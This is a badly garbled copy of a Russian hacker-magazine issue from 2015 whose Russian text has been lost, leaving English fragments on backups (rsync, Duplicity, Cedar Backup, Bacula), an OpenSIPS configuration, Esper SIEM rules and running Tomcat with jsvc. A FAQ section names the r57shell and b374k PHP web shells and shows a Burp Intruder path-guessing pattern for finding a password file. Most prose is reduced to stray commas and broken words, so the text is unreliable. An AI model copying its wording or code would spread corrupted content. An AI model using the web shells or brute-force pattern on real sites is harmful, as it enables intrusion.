$ rsync --progress -e ssh -avz


--rsync-path="rsync
--fake-super" --numeric-ids /home/
adminuser/Docs
adminuser@leopard:/home/admin
user/ backup/
Rsnapshot, , rsync, Perl. ,
.
preexec- postexec-, , , . rsnapshot
, .
Rsync/rsnapshot
,
.

.

$ duplicity restore
--encrypt-key 75E1A006
--le-to-restore 'Downloads'
sftp://adminuser
@leopard//home/adminuser/
backup /home/adminuser
/restore

Duplicity

DUPLICITY DEJA -DUP


, Duplicity
/ .
, ,
(SCP/SSH, FTP,
WebDAV, rsync, HSI...).
:

, Duplicity
Deja-Dup.
,
, , , .
Duplicity
,
rsync/rsnapshot.
,
,
( , tar)...
Duplicity . ACL .

CEDAR BACKUP

Duplicity Deja-Dup

$ duplicity full --encrypt-key


75E1A006 /home/adminuser sftp://
aduser@leopard//home/aduser/
backup

--encrypt-key, , GPG
(,
).
, SSH ,

.

Cedar Backup
incremental, Duplicity
. /,
/ , --include
--exclude. , () , man-.

restore. , :

$ duplicity restore --encrypt-key


75E1A006 sftp://adminuser
@leopard//home/adminuser/backup
/home/adminuser/restore
/. , -, (


CD/DVD-,
Amazon S3. Cedar Backup
, Subversion,
PostgreSQL/MySQL,
... , , ,
CD/DVD-, ,
. Cedar Backup GPG, ,
- , .
,
.
, , , ,
/ , Master
( ). ,
. Cron, ,
, SSH.
, /
:
(Collect) , , (,
, ). Cedar Backup
. .
(Stage)
. - , Cedar Backup
.
. ,

01 /192/ 2015

, :
cback.collect.
(Store) . / (
) ,
.
(Purge) ,
.

XML- ,
:
<reference> ,
;
<options> , , , ,
, , , ,
, ;
<peers> .
<peer>, , (local, , , , remote), ,
;
<collect> Collect. (, ), ,
(tar, tar.gz tar.bz2), / ;
<stage> .
<staging_dir>,
, ;
<store> .
, ;
<purge> .
<retain_days>, , ;
<extensions> . , , ,
,
, , ,
-
. Bacula
-

123

, ,
- .

:

<cb_cong>
<reference>
<...>
</reference>
<options>
<starting_day>tuesday</starting_day>
<working_dir>/home/adminuser/
tmp</working_dir>
<backup_user>adminuser</backup_user>
<backup_group>adminuser</backup_group>
<rcp_command>/usr/bin/scp -B</rcp_command>
</options>
<peers>
<peer>
<name>debian</name>
<type>local</type>
<collect_dir>/home/adminuser/cback/
collect</collect_dir>
</peer>
</peers>
<collect>
<...>
<collect_mode>daily</collect_mode>
<archive_mode>targz</archive_mode>
<ignore_le>.cbignore</ignore_le>
<dir>
<abs_path>/home/adminuser/Docs</abs_path>
<collect_mode>incr</collect_mode>
</dir>
<le>
<abs_path>/home/adminuser/.prole
</abs_path>
<collect_mode>weekly</collect_mode>
</le>
</collect>
<stage>
<staging_dir>/home/adminuser/backup/
stage</staging_dir>
</stage>
<store>
<...>
</store>
<purge>
<dir>
<abs_path>/home/adminuser/backup/
stage</abs_path>
<retain_days>7</retain_days>
</dir>
<dir>
<...>
</dir>
</purge>
<extensions>
<action>
<name>encrypt</name>
<module>CedarBackup2.extend.encrypt
</module>
<function>executeAction</function>
<index>301</index>
</action>
</extensions>
<encrypt>
<encrypt_mode>gpg</encrypt_mode>
<encrypt_target>Backup User
</encrypt_target>
</encrypt>
</cb_cong>
, ,
(

124

Unixoid

), <encrypt>.
<encrypt_target>. .

cback, --full. Cron .
Cedar Backup , ,
CD- ( DVD-) : ,
.
,
.
Cedar Backup : .
,
,

.

01 /192/ 2015

1 10,


Write Bootstrap = "/var/db/bacula/home-backup.
bsr" # ,

}
:

Schedule {
Name = "Weekly-schedule"
Run = Level=Full mon at 18:00
Run = Level=Incremental tue-fri at 17:00
}

,
, .
, Bacula .
, Bacula
Cron, .
BACULA
Bacula Bacula, ,
PKI. , . ,
,
.
.
, :
Bacula .

Bacula Director
-, , ,
:
.
. Bacula :
CloudMe.com Bacula Console Bacula Director ,
. , . , 3 19 ,
( Web) .
,
WebDAV. ,
(MySQL, PostgreSQL SQLite),
,
.
150 .
.
Bacula
DriveHQ.com 1 ,
Storage Director , , WebDAV FTP. /
?
WebDAV -
.
SOHO-
50 ,
File Daemon
.
200 .
,

Yadi.sk .. Bacula Director


10 , WebDAV
Storage Director.
,
.

.
, , .
,
,
,
Bacula
.
,
. , rsync/rsnapshot
Bacula Director Storage
, -
, Director ( )
/etc
.
.
.

Cedar
Bacula Director (job),
Backup , ( ,
, , ...).
:
,
Job {
.

Name = "home_backup" #
, , Type = Backup #
Duplicity Deja-Dup.
(backup, restore, verify...)

Level = Full #
(
,
, (

),

)
, .
Client = backup-client #

,
FileSet = "bc-home-set" #

,

Bacula, Schedule = "Weekly-schedule" #


Storage = backup-storage #
,
*nix-


, ,
Messages = Daemon #
.
Pool = backup-client-pool #

,
Priority = 10 #
.


-, .

125

01 /192/ 2015

Everett Collection@shutterstock.com

SIP-

Asterisk, , , .
, . Asterisk?
SIP:
, SIP . , SIP Session Initiation
Protocol,
. . RTP. SIP SDP (Session
Description Protocol) , ,
, .
,
SIP/SDP RTP (, ,
) . , ( , ).
1. ,
SIP- INVITE, SDP RTP.
SIP- .


rommanio@yandex.ru

2. , SIP ,
SIP- TRYING ( INVITE ) RINGING,
RINGING. RINGING ,

, , .
3. , SIP- 200 OK.
SDP, ,
.
, ,
ACK.
4. RTP ,
SIP SIP- . .
5. SIP- BYE,
ACK.
.

126

Unixoid

01 /192/ 2015


SIP
.
UAC UAS User Agent Client User
Agent Server.

. SIP-
UAC, UAS.
SIP-
.
SIP-
UAC/UAS.
SIP- UAC/
UAS
.

,
,

SIP URI.
.
B2BUA
SIP-, .


OpenSIPS

(
,
.
SIP-). B2BUA
, B2BUA , ,
-B2BUA B2BUA- .
B2BUA , SIP-, ,
SIP-. ,
.
.
, . , SIP- .
SIP- stateless stateful.
iptables, ,
. ... Stateful SIP- , , INVITE ACK. Stateless-
.
, SIP- ( Asterisk,
) *nix-.
, ,
Kamailio OpenSIPS. , . OpenSIPS.

$ wget -qO - http://apt.opensips.org/key.asc |


sudo apt-key add $ sudo sh -c "echo 'deb http://apt.opensips.org/
stable111 main' > /etc/apt/sources.list.d/
opensips.list"
$ sudo apt-get update
$ sudo apt-get install opensips opensips-console

OPENSIPS
/etc/opensips/opensipsctlrc
SIP-:

SIP_DOMAIN=192.168.56.103
SIP- DNS , OpenSIPS, SIP- .
, ,
, .

DNS- NAPTR SRV.
-, , .


OpenSIPS (
/etc/opensips/opensips.cfg) :
, ,
, OpenSIPS , .
. , , tm
.
, .
OpenSIPS. SIP-, ( ) OpenSIPS, . ,
. , , - ,
.
.
,
osipsconfig, ,
, .
( ,
*nix-, C++). ,
:

OPENSIPS?
OpenSIPS
, ,
SIP- B2BUA. Asterisk , -, , OpenSIPS SIP ,
Asterisk, -, Asterisk ,
, SIP, .
, Asterisk .
OpenSIPS : (
) Asterisk, , SIP , ,
. ,
.
2.0, -

,
, .
, ,
1.11.3, , ,
LTS.
, :

WWW

#
,
OpenSIPS
listen=udp:192.168.56.103:5060
#

TCP TLS
disable_tcp=yes
disable_tls=yes

RFC 3261
,
SIP-:
https://www.ietf.org/rfc/
rfc3261.txt

mpath="/usr/lib/opensips/modules"
#
sl tm
loadmodule "sl.so"
loadmodule "tm.so"

01 /192/ 2015

127


tm
modparam("tm", "fr_timeout", 5)
modparam("tm", "fr_inv_timeout", 30)
modparam("tm", "restart_fr_on_each_reply", 0)
modparam("tm", "onreply_avp_mode", 1)
#
-
SIGNALING
loadmodule "signaling.so"
<...>
, .
sl, stateless. .
tm, stateful-,
. , :
fr_timeeout ( trying).
. , ,
. ;
fr_inv_timeout . - ,

. ;
restart_fr_on_each_reply , fr_timeout
, .
false, true;
onreply_avp_mode AVP
(Atribute-Value pair) Reply.
, 1 , AVP, , . ,
, .

osipsconfig, OpenSIPS

), ,
:

SIGNALING tm sl .
, , ,
.
main route block,
. ,
. , :
1. , .
2. ,
relay.
3. , , ,
- . ,
,
, main() , .
route (
), . :
branch_route
. , stateful-;
failure_route ( 300) ,
OpenSIPS. stateful;
onreply_route .
stateful
, - , stateless ,
;
error_route SIP.
,
( -

INFO

OpenSIPS
Web-GUI
OpenSIPS-CP.

#
route{
#
MaxForwards


.

,
483

.
,
mf_process_maxfwd_header()
,
, ,



10.

if (!mf_process_maxfwd_header("70")) {
sl_send_reply("483","Too Many Hops");
exit;
}
#
To,
,

- .
if (has_totag()) {
# OPTIONS,


,



.


,


,

.
if (is_method("OPTIONS") &&
uri==myself && (! uri=~"sip:.*[@]+.*")) {
options_reply();
exit;
}
#
,
,


. loose_
route()
(
), ,

,

16.12 RFC 3261

(

).
if (loose_route()) {
#


,

. ,


,


, .
route(relay);
} else {

Unixoid

128

01 /192/ 2015

#
,

,
,

ACK,

,
.
if (is_method("ACK")) {
if ( t_check_trans() ) {
t_relay();
exit;
} else {
#
ACK


,
.
exit;
}
}
#



"404",
HTTP.
sl_send_reply("404","Not here");
}
exit;


.
if (is_method("REGISTER")) {
if (!save("location", "m")) {
sl_reply_error();
}
exit;
}
# lookup()
,

.
,


"404".



,
.
if (!lookup("location")) {
t_newtran();
t_reply("404", "Not Found");
exit;
}
route(relay);

}
#

.
# CANCEL


.
if (is_method("CANCEL")) {
if (t_check_trans()) {
t_relay();
}
exit;
}
# t_check_trans()

ACK,
CANCEL,

,
,


.
t_check_trans();
#

Route,
To (

ACK),

.
if (loose_route()) {
xlog("L_ERR",
"Attempt to route with preloaded Route's
[$fu/$tu/$ru/$ci]");
if (!is_method("ACK")) {
sl_send_reply("403",
"Preloaded Route denied");
}
}
#
,

Record-Route


SIP-
.
if (!is_method("REGISTER|MESSAGE")) {
record_route();
}
#
URI,

-
,

route(relay).
if (!uri==myself) {
route(relay);
}
#
presence (


) ,


.
PUBLISH SUBSCRIBE
if (is_method("PUBLISH|SUBSCRIBE")) {
sl_send_reply("503",
"Service Unavailable");
exit;
}
#
REGISTER.




,
.

,

}
#

relay,
.
route[relay] {
#
INVITE
,


, ,

,

.
if (is_method("INVITE")) {
t_on_failure("fail");
}

SEMS
OpenSIPS, Asterisk, SIP. , OpenSIPS
, , , , , , SEMS.
SEMS , SER ( OpenSIPS),
:
( ) ;
B2BUA/SBC (OpenSIPS , SEMS
);
.
Asterisk SIP-, , SEMS .

,


-
,
"500".
if (!t_relay()) {
send_reply("500",
"Internal Server Error");
}

}
# fail,

failure_route[fail] {
#


,
.
if (t_was_cancelled()) {
exit;
}
}

01 /192/ 2015

129

Linphone

OpenSIPS

Twinkle

# sudo opensips -C
OpenSIPS
/etc/default/opensips:

RUN_OPENSIPS=yes
:

$ sudo service opensips start


.


,
. Linphone Twinkle.
(Linphone Preferences) Manage SIP
Accounts, Add. Your
SIP identity SIP- ( sip:_@SIP-), SIP Proxy address
( SIP-!) SIP-.
Twinkle .
Wizard .
. Linphone ,
Twinkle .
, , , , MI-:

# sudo opensipsctl fo ul_dump


MI ( ) usrloc ul_dump, , .
. , -
xlog() tcpdump/Wireshark .

OpenSIPS SIP
.

, , ,
,
-
,
.
, ,
, OpenSIPS,
, , , ,
OpenSIPS B2BUA.
Linphone

OpenSIPS
. , Twinkle
, .

SYN/ACK

01 /192/ 2015


bsploit@gmail.com

jooka5000@flicker.com

130

01 /192/ 2015

131

Esper


Esper, .
,

Elasticsearch Logstash Kibana.

}
public String getCompname() {return compname;}
public String getFile() {return le;}
public String getVirusname() {return virusname;}
}
2. , java.util.Map,
,
, :

Map<String, Object> logonEventDef = new


HashMap<String, Object>();
logonEventDef.put("src_ip", String.class);
logonEventDef.put("login", int.class);
logonEventDef.put("result", String.class);

INTRO
, , :
Esper ,
(),
. EPL (Event Processing Language),
SQL. , , , ,
:

3. ,
:

String[] rewallPropsNames =
{"src_ip", "src_port","dst_ip",
"dst_port","action"};
Object[] rewallpropsTypes =
{String.class,int.class,String.class,
int.class,String.class};

select src_ip,dst_ip,dst_port from rewall.


win:time(30 sec)
group by src_ip
having count(distinct dst_ip) > 50
output rst every 1 hour

, , . Configuration
.
.

Esper
,
Java- . , .

Conguration engineCong = new Conguration();


engineCong.addEventType("antivirus",
Antivirus.class.getName());
engineCong.addEventType("logonEvent",
logonEventDef);
engineCong.addEventType("rewall",
rewallPropsNames,rewallpropsTypes);


Esper,
(goo.gl/jC2CJA) .
esper-5.1.0.jar, ,
esper\lib, Java- ( Eclipse
Libraries Add External
JARs).


EPServiceProviderManager.getDefaultProvider(), , , EPL ( ):

EPServiceProvider engine = EPServiceProvider


Manager.getDefaultProvider(engineCong);
EPAdministrator admin = engine.
getEPAdministrator();
//


EPStatement rule = admin.createEPL("select * from
logonEvent(result='fail').win:time(1 min) group by
src_ip having count(*)>30");
Esper , .
, :


, . :
1. :

public class Antivirus {


private String compname;
private String le;
private String virusname;
public Antivirus(String compname,String
le,String virusname){
this.compname=compname;
this.le=le;
this.virusname=virusname;

WWW

Esper:
www.espertech.com
- EPL-:
goo.gl/1z1buA
:
goo.gl/sDIuIo

rule.stop();
rule.start();
, Esper
.
EPRuntime
sendEvent, . , ,
:

EPRuntime runtime = engine.getEPRuntime();


runtime.sendEvent(new Antivirus("user-pc","c:\\
windows\\virus.exe","Trojan"));

132

SYN/ACK

01 /192/ 2015

Map<String, Object> logonEvent = new


HashMap<String, Object>();
logonEvent.put("src_ip", "10.0.0.1");
logonEvent.put("login", "root");
logonEvent.put("result", "fail");
runtime.sendEvent(logonEvent,"logonEvent");
Object [] rewallEvent={"10.0.0.1",32000,
"10.0.0.2",22,"permit"};
runtime.sendEvent(rewallEvent,"rewall");

. , UpdateListener:

public class MyUpdateListener implements


UpdateListener {
public void update(EventBean[] newEvents,
EventBean[] oldEvents) {
if (newEvents != null) {
String eventType = newEvents[0].
getEventType().toString();
Object event = newEvents[0].
getEventType();
System.out.println
("Event received "+eventType+" "
+ newEvents[0].getUnderlying());
}
}
}

, SQL-
60 ,
,
60 .

EPL-

:


() ,
addListener.

select src_ip,dst_ip,dst_port,isAllowed
from rewall.win:time(30 sec) as fw,
sql:mysql ['select case when exists
(select ip from scanAllowed
where ip=${src_ip}) then true
else false end as isAllowed']
as allowed where isAllowed=0
group by fw.src_ip
having count(distinct fw.dst_ip) > 50
output rst every 1 hour;

UpdateListener myListener = new MyUpdateListener();


rule.addListener(myListener);

update, . , EPL- .

XML JSON (
Elasticsearch) EventRenderer, EPRuntime
:

. ,
,

outer join:

JSONEventRenderer jsonRenderer = engine.


getEPRuntime().getEventRenderer().
getJSONRenderer(rule.getEventType());
String json = jsonRenderer.render(event);

select src_ip,dst_ip,dst_port,ip
from rewall.win:time(30 sec) as fw
left outer join sql:mysql ['select ip from
scanAllowed'] as allowed
on fw.src_ip=allowed.ip
where ip is null
group by fw.src_ip
having count(distinct fw.dst_ip) > 50



, ,
: DNS, Proxy, ,
.
. , ,
EPL- (
), , ,
Esper
JDBC-.
API.
. ConfigurationDBRef :
, , . .

CongurationDBRef mysql = new CongurationDBRef();


mysql.setDriverManagerConnection
("com.mysql.jdbc.Driver",

"jdbc:mysql://localhost/testDB", "user", "password");


mysql.setExpiryTimeCache(60, 120);
engineCong.addDatabaseReference("mysql", mysql);

INFO
Esper

jdbc,

Java-,
EPL,
.

Esper IP-, scanAllowed, ,


:
Esper ,
JIRA (goo.gl/TvudJL).
, , ,
ipplan,
.
, . ,
Wi-Fi- , -
. ,
Esper -

01 /192/ 2015

133

Esper

sql:mysql ['select description from ipplan


where ${ipToInt(dst_ip)} between startaddr
and endaddr'] as dst_net
where src_net.description = 'wi' and
dst_net.description='database' and
action='permit'
output rst every 1 hour

EPL, IP-, GeoIP
(goo.gl/TIOP8B), .

EPL


. Esper
.
Log4j.
, log4j.xml log4j.
configuration (
,
esper\etc):

java -Dlog4j.
conguration=log4j.xml ...
EPL-

@Audit, :

@Audit('stream,property')
select src_ip,dst_ip,
dst_port from rewall
IP- ,
EPL-:

, . , stream
, ,
property . Esper .
, EPL-,
. :

public class MyEsperUtils {


public static Long ipToInt(String addr) {
String[] addrArray = addr.split("\\.");
long num = 0;
for (int i=0;i<addrArray.length;i++) {
int power = 3-i;
num += ((Integer.parseInt
(addrArray[i])%256 *
Math.pow(256,power)));
}
return num;
}
}

engineCong.getEngineDefaults().getLogging().
setEnableQueryPlan(true);
SQL- :

engineCong.getEngineDefaults().getLogging().
setEnableJDBC(true);

, , , :

, , .

engineCong.addPlugInSingleRowFunction
("ipToInt", "MyEsperUtils", "ipToInt");
, EPL- wifi database:

select src_ip,dst_ip,action,src_net.
description,dst_net.description
from rewall as fw,
sql:mysql ['select description from ipplan
where ${ipToInt(src_ip)} between startaddr
and endaddr'] as src_net,

WARNING


,
Esper


.

LOGSTASH
,
, .

Elasticsearch Logstash
Kibana (ELK) (goo.gl/MHIeiG). Elasticsearch () ,
Kibana , Logstash .
,

134

SYN/ACK

01 /192/ 2015

//

Redis
List<String> events = jedisTake.blpop(0,input);
String event = events.get(1);
JSONObject eventJson = new JSONObject(event);
//

String type = eventJson.getString("type");


Map<String, Object> eventMap = new HashMap
<String, Object>();
Iterator<String> keys = eventJson.keys();
while(keys.hasNext()){
String key = keys.next();
String value = eventJson.getString(key);
//




eventMap.put(key, value);
}
//

runtime.sendEvent(eventMap,type);
input . update,
JSON alerts:

SIEM. , , . ,
, Logstash ,
Elasticsearch.
Redis,
.
Redis :
input Logstash , JSON-.
;
alerts .


Esper ELK

for(int i=0; i<newEvents.length; i++){


//

EventType eventType = newEvents[i].


getEventType();
jsonRenderer = runtime.getEventRenderer().
getJSONRenderer(eventType);
// JSON-
alertEvent = jsonRenderer.
render(newEvents[i]);
//
Redis
jedisPublish.rpush(alerts, alertEvent);
}
pipe.sync();

, java.util.Map. Redis Jedis,


( Jedis):

Jedis jedisTake = jedisFactory.getJedisPool().


getResource();

public void update(EventBean[] newEvents,


EventBean[] oldEvents) {
Jedis jedisPublish = jedisFactory.
getJedisPool().getResource();
Pipeline pipe = jedisPublish.pipelined();
String alertEvent = "";


ELK-

Logstash
Redis Elasticsearch, Kibana
.

, , Java-

Esper,


. Esper
Elasticsearch Logstash Kibana,
ELK- SIEM.
, (goo.gl/sDIuIo),


,
.
!

01 /192/ 2015

135


sgvozdetskiy@yahoo.com

APACHE
TOMCAT UNIX-

Apache Tomcat -,
,
-. , . UNIX Tomcat.

, root , root ,
. ,
*nix,
root- , ,
wheel. ,
. MS Windows,
,
.
, .
, , , .
, ,

. ,
, . , . ,
.
, . ,
,
,
.
, httpd
Apache, 2 apache. , , ,
. Apache

136

SYN/ACK

01 /192/ 2015

, .
.
1


Java- Tomcat,
. , ,
. .
( ) ,
- . ,
.
,
? ,
, ?
, . ,
,
/bin/su tomcat $CATALINA_HOME/bin/startup.sh. ,
tomcat, , , , Linux/UNIX? .
, , root. ? :
, .
root .
, ,
.
changelog .
,
root-.
.
, , , .

?
root httpd: ( Perl),
- DocumentRoot, SQL , . , :
1. httpd, MySQL, PostgreSQL
? : root- .
2. , ,
? . : , SUID
fork().
(. 1).
. master ,
nobody, ,
, ( 80). , ,
, (/), nobody .
.
(. 2).
, ? PPID.
: master PPID 1,
init, PPID = PID master-.
, ,
syslogd . ,
, , SIGHUP, reload

.1. nginx
. 2. nginx

, -
,
. SIGSTOP, (SIGCONT).
, ,

, root Tomcat.
, .

JSVC

WWW

:
goo.gl/DCQrsE

Tomcat:
goo.gl/30ZcSl
JVM:
goo.gl/yhrnVd

Apache Commons jsvc, Tomcat.


, Tomcat UNIX-. Jsvc UID fork(),
,
, Java-, Java-, assertions , , , -help.
, ,
, base CentOS
jakarta-commons-daemon-jsvc, Java daemon launcher. , . make GCC. $CATALINA_HOME/bin/ commons-daemon-native.tar.gz,
unix:


, ,
.
, ,
. .
.
*nix- , , , . ,
Solaris: pcred(1), UID
GID . , , , ,
.
,
.

01 /192/ 2015

137

$ tar xzvf commons-daemon-native.tar.gz ;


cd commons-daemon-1.0.10-native-src/unix/
(goo.gl/TX7Y1s) , ./congure ; make ; cp jsvc ../.. ; cd ../.., ,
./congure, ,
, gentoo- .
-, -withjava=$JAVA_HOME, JAVA_HOME JDK. , Java,
, ,
. -, -withos-type=linux, ,
.
JAVA_HOME/include/<OS_ _ _ _JDK>,
,
Sun. -, GCC
CFLAGS=-m64 LDFLAGS=-m64, , .
: x86-, 32- .

: ./congure -with-java=/usr/java/latest -withos-type=/include/linux CFLAGS=-m64 LDFLAGS=-m64,
, Wiki Gentoo (goo.gl/jmGho0) .
,
.
,
CentOS 5, , Tomcat 6.
make clean make,

, , fork().
, .
, . ,
, .
, ( , ),
,
. Linux
clone(2), . ( ) ,

, -. Java JVM, , , ,
root.

# chkcong: 345 73 21
# description: Tomcat super daemon
(. 3).

libservice.a. , Malformed archive ar. 2.20


.
, (Tomcat). bin
. 7.x ,
Java setenv.sh,
(JAVA_OPTS="Xmx2G -Xms1G ..."). , bin, daemon.
sh, TOMCAT_USER
, ,
daemon. ,
/sbin/nologin, ,
.
:

. 3.
Tomcat

$ su daemon
This account is currently not available.

$ ll /etc/init.d/tomcatd
lrwxrwxrwx 1 root root 30 Jun 26 13:38 /etc/
init.d/tomcatd -> /opt/tomcatd/bin/daemon.sh
CentOS, ,
chkconfig , :

$ head /etc/init.d/tomcatd
#!/bin/sh

- , .
catalina-daemon.out. , catalinadaemon.err.
, root, ,
daemon. , /sbin/nologin,
- , , .


Java-, UNIX, .
:
1. , fork(), .
2. Im ready, wait_child()
.
3. , nginx. Java-, , Tomcat,
.

140

FAQ

01 /192/ 2015


FAQ@REAL.XAKEP.RU

SSH Mosh. :

mosh root@server

Wi-Fi- SSH-,
- ?
, . Mosh. , root,
. :
SSH-,
, .
Wi-Fi ,
IP;
,
UDP predictive
echo;
Mosh
, .
<trl + C> ,
500- .

Zemond

3em0nd@gmail.com


arp-scan.
ARP-, . :


:
1. Mosh SSH
mosh-server, UDP- 60000 61000.
2. SSH-.
3. mosh-client mosh, 1.
, , tmux
,
.
IP MAC-
. ARP- .

arp-scan




. GUI Winff:

,
Ubuntu?

. ,
GUI. . :

Q
A

sudo aptitude install winff

Avidemux

sudo aptitude install ffmpeg lame


,


Avidemux:

ffmpeg -i video.avi -acodec pcm_s16le


-ac 2 -ab 128k -vn -y "most.wav"
lame --preset cd most.wav music.mp3
rm most.wav

sudo aptitude install avidemux

, . , FFmpeg
(goo.gl/1fKyBo).


, ,
. ,
,
, , ,



. , , GUI
,

Avidemux.
,
FFmpeg ,
. Cinelerra, Jahshaka, Kdenlive, Kino
LiVES. , , ,
,
FFmpeg .

141

FAQ

01 /192/ 2015

sudo arp-scan --localnet >>


result.arp-scan
,
--interface:

sudo arp-scan --interface=eth0


192.168.0.0/24
, ,

?


r57shell,
( , , : goo.gl/PGjbll).
b374k shell (goo.gl/QVA90d) .
,
PHP, , . , .


memtester (goo.gl/qbqThx). . memtest86,

. Memtester ,
.
:


5 .

memtester 5g 1


Ubuntu Server. GUI, , ?

. megacli
(goo.gl/2DuuQL),
. ,
,
: goo.gl/hyvS8W.

. m , . , GPT. n, ,
, primary. , 1.
, w, . ,
, p. , . - , , , .

,
.

MegaCli64 -PDList -Aall


, .
, , :
sda, sdb , , . , :

megacli -PDList -Aall | egrep 'Slot|Raw|Inquiry|Enclosure|Firmware state'


- :

Enclosure Device ID: 32


Slot Number: 2
Enclosure position: 1
Raw Size: 558.911 GB [0x45dd2fb0 Sectors]
Firmware state: Online, Spun Up
Inquiry Data: BTW INTEL SSDSC2
Enclosure Device ID: 32
Slot Number: 3
Enclosure position: 1
Raw Size: 2.728 TB [0x15d50a3b0 Sectors]
Firmware state: Uncongured(good), Spun Up
Inquiry Data: 149TOSHIBA
3 .

. , ext4.

fsck.ext4 /dev/sdX1
, GPT . ,
.

mkdir /disk1
.
:

mount /dev/sdX /disk1

, fstab.
, UUID. . UUID

blkid /dev/sdX1
UUID /etc/fstab:

nano /etc/fstab

.
fdisk. :

fdisk /dev/sdX

- :

UUID="a35db35e-d660-910a-478e-4927169bd09b"/disk1
ext4 defaults,noatime,nodiratime 0 0

FAQ

142

, ,
.

-, :
?
, ! , ,

(goo.gl/BSMLmS). ,
. exploit-db.com , .

Q
A

/etc/fstab , UUID
. ?

.
.
:

Q
A

ls -l /dev/disk/by-uuid

blkid (, , ).
,

sudo blkid
.

01 /192/ 2015

,

?
! ,
checkio.org.

Python.
,
, .
, Checkio
. , Learning
.
. Score
Games Single Player Game. , , . Competition Multi Player Game.
.
pythonchallenge.com.
, ,
? , CTF
Python.
,

Q
A



, ,
SQLMAP
-

,

. , . codecademy.com
, .
: <Ctrl + C> <Ctrl + V>.
?
,
<Shift + Ins>. ,
.
, : ...
:,
. , , .
- ,
<Ctrl +
V>. :
( ) EditPaste
<Ctrl + V>
.
- .

Q
A

,
pass.txt,
.
,
. ,
- .

Intruder Burp
Suite,
. , .
sniper, - :

WATCH DOGS
Watch dogs, ,
?

,
,
, sqlmap
- .

.
,
VDS 5
,

.

,
, ,

.
information gathering
,
,
.
, ,

.
,
,

.

/$aa$/pass.txt
, ,
, , . ,

Status, .
.
?
, , IPython
(ipython.org).
Python,

Q
A

01 /192/ 2015

, ,
. ,
(goo.gl/CLUfM3) : goo.
gl/TK6Vvw, IPython .

, IPython . - ,
- , . must have
.

,
,
.
?
, ,
. PCIe x.0, PCI
. , .
PCIe 2.0,
3- PCI .
,

.

Q
A

143

FAQ

, , , ,

.
. ,
, ,
, . -
. ,
, :
, , .

,
Wireshark?
, , tcpdump. ,
: , , , ,
.
-

Q
A

tcpdump

;


.

. ,

tcpdump -i eth0
, .
,
.

,
? .xakep.ru!
group

[!

WWW 2.0
144

01

UNSHORT.ME (unshort.me)

Unshort.me ,
. , bit.ly, goo.gl .
, URL ,
, , ,
. - (
), unshort.me.
Chrome, ,
.

GOOGLE GUIDE FOR TECHNICAL DEVELOPMENT

IT Google

(www.google.com/edu/tools-and-solutions/guide-for-technicaldevelopment/index.html)
Google
IT . ,

(-, ,
, ,
). , .
, IT-.

03
RECAPTCHA MAILHIDE

(https://www.google.com/recaptcha/admin#mailhide)
Google API reCAPTCHA
,
Mailhide.
email,
HTML-,

.
. , Google ,
.

02
SKYPE (skype.com)
,
. -
- - ,
. ,
, ,

Skype. Chromebook,

.

email
-

04